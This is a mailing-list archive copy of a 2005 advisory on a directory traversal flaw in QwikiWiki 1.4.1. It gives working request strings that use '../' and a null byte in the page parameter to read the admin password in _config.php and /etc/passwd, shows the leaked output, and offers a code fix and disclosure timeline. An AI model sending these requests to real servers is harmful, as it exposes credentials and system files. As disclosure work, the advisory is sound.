lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <41DAEF1D.5090907@iname.com>
From: madelman at iname.com (Madelman)
Subject: QWikiwiki directory traversal vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title: QWikiwiki directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 01/01/2005
Severity: Critical

Summary:
- --------

QwikiWiki is driven by one core design goal: simplicity. This design
goal is codified into three key principles:
~ Self Sufficiency: QwikiWiki requires only a web server and PHP.	
~ Zero-Edit Deployment: QwikiWiki is immediately usable "out of the box".	
~ Minimalist Featureset: QwikiWiki is not everything to everybody.	

QwikiWiki uses only cookies and the file system, and thus does not
require a MySQL server or any other database
support. Data is stored in simple text files, and backups are just
complete copies of the data directory. Ain't
nothing fancier than it need be.
(from vendor site: http://www.qwikiwiki.com)

QWikiwiki doesn't check the page parameter which allows reading any file

This vulnerability has been tested with QWikiwiki 1.4.1


Details:
- --------

If we want to read the password for QWikiwiki:

REQUEST:
http://[SERVER]/qwiki/index.php?page=../_config.php%00
RETURNS: (looking at source of HTML)
[...]
$QW_CONFIG['title'] = "QwikiWiki";
$QW_CONFIG['adminName'] = "David Barrett";
$QW_CONFIG['adminPassword'] = 'changeme!'


We can also read any file the webserver has permission to:

REQUEST:
http://[SERVER]/qwiki/index.php?page=../../../../../../etc/passwd%00
RESPONSE:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]


Solution
- --------

Temporary Fix
In file _wikiLib.php substitute

function QWCreateDataPath?( $page, $extension )
{
return 'data/'. $page . $extension;
}

with

function QWCreateDataPath?( $page, $extension )
{
if (strpos($page, "..") === false) {
~   return 'data/'. $page . $extension;
} else {
~   return '';
}
}


Timeline
- --------

01/01/2005 - Vulnerability found
01/01/2005 - Vendor contacted
01/01/2005 - Vendor confirmed bug
04/01/2005 - Bug published in vendor page and advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFB2u8d3RWooxY20cIRArbIAJsEu1pSqJuHdYpWmOO76oHoTxcixACgj/sP
BcUAER8m/maxIApdZEQ0MfA=
=LZ+j
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ